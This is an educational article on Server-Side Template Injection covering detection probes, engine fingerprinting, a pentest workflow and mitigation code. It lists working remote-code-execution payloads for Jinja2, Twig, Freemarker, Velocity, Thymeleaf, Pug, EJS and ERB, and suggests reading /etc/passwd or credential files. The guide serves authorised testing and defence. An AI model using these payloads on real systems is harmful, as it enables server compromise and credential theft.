SSTI: what Server-Side Template Injection is and how it becomes RCE

SSTI (Server-Side Template Injection) is what happens when an application concatenates user input directly into a template that is evaluated on the server. The template engine (Jinja2, Twig, Freemarker, etc.) no longer sees the input as data to be displayed — it sees it as template code to be executed. From that point on, what was a name field, an email signature, or a URL parameter becomes an arbitrary expression running in the context of the application process. Because template engines exist precisely to evaluate expressions and, in many cases, to access objects and methods of the host language, SSTI tends to escalate from “I can compute 7*7” to RCE (remote code execution) with uncomfortable ease. It is this proximity to the language that sets SSTI apart from XSS: both are markup injection, but XSS executes in the victim’s browser (client context, browser sandbox, impact on the session of whoever visits) while SSTI executes on the server (application context, file system, internal network, credentials). Same family, completely different severity.

How it works

A template engine takes a template (text with markers) and a context (a dictionary of variables) and produces a final string. When you write Hello {{ name }} and pass {"name": "Alice"}, the engine replaces {{ name }} with Alice. All good: name was treated as data.

The problem arises when the developer builds the template itself from user input. In Python/Flask with Jinja2, the difference is literally one line:

from jinja2 import Template

# SAFE — input goes in as data through the context
Template("Hello {{ name }}").render(name=user_input)

# VULNERABLE — input becomes part of the template and is evaluated
Template("Hello " + user_input).render()

In the vulnerable version, if user_input is Alice, nothing happens. But if it is {{ 7*7 }}, the engine finds a marker in the template it is itself compiling and evaluates the expression: the output becomes Hello 49. The 49 is the proof: the input was not displayed, it was executed on the server.

The root cause is always the same: confusing the template (logic, trusted) with the context (data, untrusted). Engines are designed to evaluate expressions — and many expose enough of the host language (object attributes, base classes, modules) for an expression to turn into file reads, system calls, or access to environment variables. Classic scenarios: transactional emails with a “customizable template,” error pages that echo parameters, report/invoice generators, and any endpoint that accepts “personalize your message.”
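
The template/context split can be made concrete with a toy engine. The sketch below is not Jinja2: it is a deliberately tiny stand-in (the names render, _evaluate, and _MARKER are invented for illustration) that only understands variable lookups and integer arithmetic. It shows why markers in the template body are evaluated while markers inside context values are not.

```python
import ast
import operator
import re

# Toy stand-in for a template engine (NOT Jinja2): it only understands
# {{ name }} lookups and integer arithmetic such as {{ 7*7 }}.
_OPS = {ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul}
_MARKER = re.compile(r"\{\{(.*?)\}\}")


def _evaluate(node, context):
    """Evaluate a tiny, harmless subset of expressions."""
    if isinstance(node, ast.Expression):
        return _evaluate(node.body, context)
    if isinstance(node, ast.Constant) and isinstance(node.value, int):
        return node.value
    if isinstance(node, ast.Name):
        return context[node.id]
    if isinstance(node, ast.BinOp) and type(node.op) in _OPS:
        left = _evaluate(node.left, context)
        right = _evaluate(node.right, context)
        return _OPS[type(node.op)](left, right)
    raise ValueError("unsupported expression")


def render(template, **context):
    """Scan the template for markers once; context values are never rescanned."""
    def replace(match):
        tree = ast.parse(match.group(1).strip(), mode="eval")
        return str(_evaluate(tree, context))
    return _MARKER.sub(replace, template)


user_input = "{{ 7*7 }}"
safe = render("Hello {{ name }}", name=user_input)  # input travels as data
vulnerable = render("Hello " + user_input)          # input becomes template
print(safe)
print(vulnerable)
```

The first call prints the input untouched, because the only marker the engine ever saw was {{ name }}. The second call evaluates the multiplication, because the input was already part of the template when the engine scanned it.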

How to detect

Detecting SSTI has two stages: confirming that there is server-side evaluation and identifying which engine is behind it.

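The first test is arithmetic, because the result is easy to recognize. If you inject 7*7 inside a template marker and the response contains 49 instead of the literal text, something evaluated the multiplication. Confirm this in the raw HTTP response: client-side frameworks such as AngularJS also evaluate {{7*7}}, but they do so in the browser, which is a different finding. The catch is that each engine family uses a different marker syntax: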

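{{7*7}}      → Jinja2, Twig, Nunjucks (double-brace syntax; Handlebars shares the braces but does not evaluate arithmetic)
${7*7}       → Freemarker, Thymeleaf expressions (dollar syntax; Velocity uses $ references but needs #set($x=7*7)$x for arithmetic)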
<%= 7*7 %>   → ERB (Ruby), EJS (Node)
#{7*7}       → Pug, and some variants
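
A minimal sketch of how these probes could be generated and checked. The function names and the SYNTAXES table are assumptions made for illustration, and sending the request is left out on purpose. Using operands other than 7 makes it less likely that the product already appears in the page by coincidence.

```python
# Opening and closing delimiters for the marker families in the table above.
SYNTAXES = {
    "double-brace": ("{{", "}}"),
    "dollar": ("${", "}"),
    "erb-style": ("<%= ", " %>"),
    "hash": ("#{", "}"),
}


def build_probes(a, b):
    """Return one arithmetic probe per marker family."""
    expression = f"{a}*{b}"
    return {
        family: opener + expression + closer
        for family, (opener, closer) in SYNTAXES.items()
    }


def was_evaluated(body, probe, a, b):
    """True when the product shows up in the body and the raw probe does not."""
    return str(a * b) in body and probe not in body


probes = build_probes(1337, 7331)
for family, probe in probes.items():
    print(family, probe)
```

A response that contains the product but not the probe text suggests that the corresponding family was evaluated; a response that echoes the probe unchanged suggests it was treated as data.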

That is why it is pragmatic to start with a polyglot: a single string of special characters drawn from several syntaxes, meant to trigger a parsing error in whichever engine is present:

${{<%[%'"}}%\

If something breaks, reflects a computed value, or generates a template error, you are on the trail. From there, the decision tree disambiguates engines that share syntax. The well-established trick is {{7*'7'}}, which behaves differently depending on the language’s semantics:

{{7*7}}     returns 49?         → double-brace family confirmed
{{7*'7'}}   returns 7777777?    → Jinja2 (Python: int * str repeats the string)
{{7*'7'}}   returns 49?         → Twig (PHP: '7' is coerced to an integer)

The logic is “returns X, therefore engine Y”: multiplying an integer by a string and getting the string repeated indicates Python (Jinja2); numeric coercion indicates PHP (Twig). For the dollar family, fire payloads specific to Freemarker vs Velocity vs Thymeleaf and observe which one produces a distinct output or error. Error messages also give the game away: a stack trace with jinja2.exceptions, freemarker.core, or org.thymeleaf settles the identification on the spot. Always start with generic detection (7*7), then refine with payloads that only one engine understands.
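
The decision tree can be sketched as a small function. This is an illustration under simple assumptions: identify_engine and STACK_TRACE_HINTS are hypothetical names, the inputs are response bodies already collected by the tester, and substring matching on 49 can produce false positives on pages that contain that number anyway.

```python
# Package names that appear in stack traces, as listed in the text above.
STACK_TRACE_HINTS = {
    "jinja2.exceptions": "Jinja2",
    "freemarker.core": "Freemarker",
    "org.thymeleaf": "Thymeleaf",
}


def identify_engine(resp_int_probe, resp_str_probe, error_text=""):
    """Guess the engine from the responses to {{7*7}} and {{7*'7'}}.

    resp_int_probe: body returned for {{7*7}}
    resp_str_probe: body returned for {{7*'7'}}
    error_text:     any error page or stack trace seen along the way
    """
    # A stack trace that names the engine settles the question immediately.
    for needle, engine in STACK_TRACE_HINTS.items():
        if needle in error_text:
            return engine
    if "49" not in resp_int_probe:
        return "unknown"
    if "7777777" in resp_str_probe:
        return "Jinja2"  # Python: int * str repeats the string
    if "49" in resp_str_probe:
        return "Twig"    # PHP: '7' is coerced to a number
    return "double-brace family, engine undetermined"


print(identify_engine("Hello 49", "Hello 7777777"))
print(identify_engine("Hello 49", "Hello 49"))
```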

By engine

Jinja2 (Python/Flask) — the vector is to navigate the Python object hierarchy from a literal until you reach subprocess or os. Representative RCE payload:

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}

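A classic alternative, useful when self is not accessible, starts from an empty string and climbs via __class__/__mro__/__subclasses__. The expression below only enumerates the classes loaded in the process; the chain is completed by picking a useful class from that list, and its index varies between environments: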

{{ ''.__class__.__mro__[1].__subclasses__() }}

Twig (PHP): in modern versions, the cleanest path is a filter that accepts a PHP callable, such as filter or map. The established payload uses filter with system:

{{['id']|filter('system')}}

In legacy environments (Twig 1.x), the chain via _self still shows up:

{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("id")}}

(Note that the registered filter must be the execution function, e.g. system or exec, and the filter called next is the command — id.)

Freemarker (Java) — the API exposes Execute directly, and that is why Freemarker is so exploitable:

<#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")}

Velocity (Java) — abuses reflection from any class to reach Runtime. Established payload:

#set($x='')
#set($rt=$x.class.forName('java.lang.Runtime'))
#set($chr=$x.class.forName('java.lang.Character'))
#set($str=$x.class.forName('java.lang.String'))
$rt.getRuntime().exec('id')

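A compact form that reuses $rt from the block above is also cited; verify it against the target's Velocity version before relying on it: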

#set($e="exec")$rt.getRuntime().$e("id")

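(In both, what matters is obtaining java.lang.Runtime via forName and invoking getRuntime().exec(...). The $chr and $str classes are not needed to launch the process; longer variants use them to read the command output back into the page.)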

Thymeleaf (Spring): expression preprocessing with __${...}__ forces the evaluation of SpEL, which opens up Runtime. The most established vector is user input that reaches a view name or fragment expression. The underlying SpEL expression is:

${T(java.lang.Runtime).getRuntime().exec('id')}

In fragment preprocessing:

__${T(java.lang.Runtime).getRuntime().exec("id")}__::.x

Pug (Node): #{...} interpolation evaluates a JavaScript expression on the server (the output is HTML-escaped, but the expression still runs), so it is direct RCE:

#{global.process.mainModule.require('child_process').execSync('id')}

EJS (Node) — historically, the well-known RCE does not come from the output delimiter (which evaluates a simple expression), but rather from abusing rendering options, such as the outputFunctionName parameter. When there is control over the template/options, injection in a scriptlet runs arbitrary JS:

<% global.process.mainModule.require('child_process').execSync('id') %>

(The <%= ... %> delimiter prints the result of an expression; for arbitrary statements use <% ... %>.)

Handlebars (Node) — logic-less by design, but exploitable via manipulation of the constructor prototype to build a function and execute it (a long chain, well documented in PayloadsAllTheThings; the trigger is reaching require('child_process')).

ERB (Ruby) — the scriptlet evaluates pure Ruby. The established forms:

<%= `id` %>

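Or, with the same result in the page: <%= IO.popen('id').read %>. Note that <%= system("id") %> also runs the command, but it renders true or false, because the command output goes to the server process's stdout instead of the template.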

How we exploit it in a pentest

The flow is always the same, and discipline matters as much as the payload:

Detect. Inject {{7*7}}, ${7*7}, and <%= 7*7 %> at every reflected point. Look for 49, anomalous behavior, or a template error. In blind cases (no direct reflection), use payloads that trigger a delay or out-of-band interaction to confirm server-side evaluation.
Identify the engine. Apply the decision tree: {{7*'7'}} to separate Jinja2 (7777777) from Twig (49); $-family payloads for Freemarker/Velocity/Thymeleaf; carefully read any stack trace, which usually names the engine outright.
Bypass the sandbox / escalate. Several engines can run templates in a sandbox (Jinja2 SandboxedEnvironment, Twig’s sandbox, restricted SpEL). The work here is finding the object chain that escapes it or, where no sandbox is configured, the shortest chain to code execution: climbing from a literal to __globals__/__builtins__ in Python, reaching Runtime via reflection in Java, or getting to child_process in Node. This is the step that most requires engine-specific knowledge.
File read or RCE. Before going for RCE, file reading often already proves critical impact with less noise — reading /etc/passwd or a config file with credentials demonstrates filesystem access without running any process.
Demonstrate impact — with a harmless command. RCE proof must use non-destructive and idempotent commands: id, whoami, hostname, uname -a. Never run anything that changes state, deletes data, or exfiltrates real client information. The goal is to evidence capability, not to cause harm.

Evidence best practices: capture the full request and the response with the command output; record the exact payload, the timestamp, and the user/context under which the code ran (the output of id already gives you that). If there is file reading, prefer a predictable system file (/etc/passwd) over rummaging through sensitive client data. Document the identified engine and version, because that drives the remediation. The entire chain — from 7*7 to id — must be reproducible in the report.
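
One way to keep that chain reproducible is to record every step in a structured form as it happens. The sketch below is only a suggestion: the SstiEvidence fields, the to_report_json helper, and the example.test endpoint are hypothetical and should be adapted to whatever the report template expects.

```python
import json
from dataclasses import asdict, dataclass, field
from datetime import datetime, timezone


@dataclass
class SstiEvidence:
    """One step of the chain, from the first probe to the harmless command."""
    endpoint: str
    parameter: str
    payload: str
    response_excerpt: str
    engine: str
    engine_version: str = "unknown"
    # UTC timestamp taken when the record is created.
    timestamp: str = field(
        default_factory=lambda: datetime.now(timezone.utc).isoformat()
    )


def to_report_json(chain):
    """Serialize the ordered list of steps for the report appendix."""
    return json.dumps([asdict(step) for step in chain], indent=2)


# Hypothetical target and responses, for illustration only.
chain = [
    SstiEvidence("https://app.example.test/greet", "name",
                 "{{7*7}}", "Hello 49", "Jinja2"),
    SstiEvidence("https://app.example.test/greet", "name",
                 "{{7*'7'}}", "Hello 7777777", "Jinja2"),
]
print(to_report_json(chain))
```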

Report summary

Impact: Remote code execution on the application server via injection into a server-side evaluated template, with access to the file system, environment variables/credentials, and the internal network.
Severity: Critical.
CVSS 4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H (subsequent scope/systems set to High due to the ability to pivot into the internal network; adjust SC/SI/SA to N if the segment does not allow lateral movement).
Preconditions: User input concatenated/interpolated into the template body (instead of passed as a context variable); engine without an effective sandbox or with a known bypass.
Evidence: Payload {{7*7}} returned 49 (server-side evaluation confirmed); {{7*'7'}} returned 7777777 (Jinja2); execution of id returned the identity of the application process. Requests, responses, and timestamps attached.
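
The SC/SI/SA adjustment mentioned in the summary is mechanical, so it can be scripted. The sketch below only parses and rewrites the vector string; it does not compute a score, and the helper names are invented for illustration.

```python
VECTOR = "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"


def parse_vector(vector):
    """Split a CVSS 4.0 vector string into an ordered metric dictionary."""
    prefix, *metrics = vector.split("/")
    if prefix != "CVSS:4.0":
        raise ValueError("not a CVSS 4.0 vector")
    return dict(metric.split(":", 1) for metric in metrics)


def without_lateral_movement(vector):
    """Set the subsequent-system metrics (SC, SI, SA) to None (N)."""
    metrics = parse_vector(vector)
    for key in ("SC", "SI", "SA"):
        metrics[key] = "N"
    return "CVSS:4.0/" + "/".join(f"{k}:{v}" for k, v in metrics.items())


print(without_lateral_movement(VECTOR))
```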

How to mitigate

The golden rule is to never treat user input as a template. Input is data; it enters through the context, not through the template body:

from jinja2 import Template

# UNSAFE — input controls the template structure
def render_unsafe(user_input):
    return Template("Hello " + user_input).render()

# SAFE — template is fixed, input goes in as a context variable
TEMPLATE = Template("Hello {{ name }}")

def render_safe(user_input):
    return TEMPLATE.render(name=user_input)

In the safe case, {{ 7*7 }} in user_input is rendered literally as the text {{ 7*7 }}, because the engine only evaluates markers that were already in the fixed template — the context data is never reinterpreted as template.

Other controls:

Logic-less templates. Prefer engines that separate data from logic by design, such as Mustache, or Handlebars with prototype access left at its restrictive default. Less expressiveness in the template, less attack surface.
Never render user-controlled templates. If the product requires “customizable templates” by the client, this is a maximum-risk feature — treat it as third-party code executing on your server.
Know the sandbox’s real limits. Jinja2 SandboxedEnvironment, Twig’s sandbox, and restricted SpEL help, but they have historical bypasses. A sandbox is defense in depth, not the primary defense. Do not rely on it to contain hostile input.
Separate data from logic. User input always as an argument to render(...), never via string concatenation in the template.
Allowlist. If the user needs to choose a template, offer a closed list of pre-approved templates on the server — they select by ID, they do not supply the content.
Keep the engine up to date. Many sandbox bypasses are fixed in later versions; running an old version reopens vectors that were already closed.
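
The allowlist control can be sketched in a few lines. To stay dependency-free, this example uses string.Template from the Python standard library as a stand-in for the real engine; the template IDs, their texts, and render_approved are hypothetical.

```python
from string import Template

# Pre-approved templates live on the server; users only ever send an ID.
APPROVED_TEMPLATES = {
    "welcome": Template("Hello $name, welcome aboard."),
    "reminder": Template("Hi $name, your invoice is due on $due_date."),
}


def render_approved(template_id, **context):
    """Render a server-side template chosen by ID; reject unknown IDs."""
    try:
        template = APPROVED_TEMPLATES[template_id]
    except KeyError:
        raise ValueError(f"unknown template id: {template_id!r}") from None
    # User-supplied values enter only as context data.
    return template.substitute(**context)


print(render_approved("welcome", name="${7*7}"))
```

Because the user never supplies template text, a marker inside name is substituted as plain data and is not scanned again.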

Mitigation checklist

Ensure no user input is concatenated/interpolated into a template body
Pass all input exclusively as a context variable in render()
Eliminate any user-controlled “customizable template” feature or isolate it strongly
Prefer logic-less templates when the use case allows
Use an allowlist of pre-approved templates (selection by ID, not by content)
Enable the engine’s sandbox mode as defense in depth — without relying on it as the only barrier
Keep the template engine on the latest version and track bypass CVEs
Add tests that inject {{7*7}}/${7*7} and validate that the output is literal, not 49
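
The last checklist item can be sketched as a reusable check that accepts any render function. Everything here is illustrative: evaluated_probes is a hypothetical helper, safe_render stands in for the application's real rendering path, and vulnerable_render is a deliberately broken stand-in used only to show what a failure looks like.

```python
import html
import re

PROBES = ["{{7*7}}", "${7*7}", "<%= 7*7 %>", "#{7*7}"]


def evaluated_probes(render):
    """Return the probes that did not come back as literal text."""
    failures = []
    for probe in PROBES:
        # Undo HTML escaping so an escaped probe still counts as literal.
        output = html.unescape(render(probe))
        if probe not in output or "49" in output:
            failures.append(probe)
    return failures


def safe_render(user_input):
    """Stand-in for a correct implementation: input is treated as data."""
    return "Hello " + html.escape(user_input)


def vulnerable_render(user_input):
    """Deliberately broken stand-in: evaluates {{a*b}} found in the input."""
    return "Hello " + re.sub(
        r"\{\{(\d+)\*(\d+)\}\}",
        lambda m: str(int(m[1]) * int(m[2])),
        user_input,
    )


print(evaluated_probes(safe_render))
print(evaluated_probes(vulnerable_render))
```

In a real suite, the render argument would be a thin wrapper around the endpoint or function under test, and the check would assert that the returned list is empty.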

SSTI is one of those bugs where the difference between secure and critical fits in a single line of code — the boundary between passing input as data and letting it become template. Treat the template as logic and data as data, and the entire class of vulnerability disappears. To test payloads by engine without memorizing chains, use our interactive SSTI cheatsheet; and, since SSTI and XSS belong to the same injection family that changes everything depending on where the code runs, it is worth comparing with the XSS guide.